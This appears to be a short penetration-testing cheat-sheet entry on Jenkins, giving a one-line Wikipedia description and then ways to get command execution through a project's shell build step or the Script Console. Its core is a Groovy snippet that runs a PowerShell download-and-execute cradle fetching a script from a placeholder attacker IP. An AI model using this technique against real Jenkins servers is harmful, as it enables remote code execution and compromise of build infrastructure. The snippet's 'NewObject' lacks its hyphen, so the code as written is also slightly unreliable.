Jenkins
Jenkins is a free and open source automation server. Jenkins helps to automate the non-human part of the software development process, with continuous integration and facilitating technical aspects of continuous delivery. It is a server-based system that runs in servlet containers such as Apache Tomcat.
-- Wikipedia
Command execution
Create new project
Build -> execute shell
or
Manage jenkins
Script console
cmd = """ powershell "IEX(NewObject Net.WebClient).downloadString('http://<ip>/file')" """
println cmd.execute().text
Last updated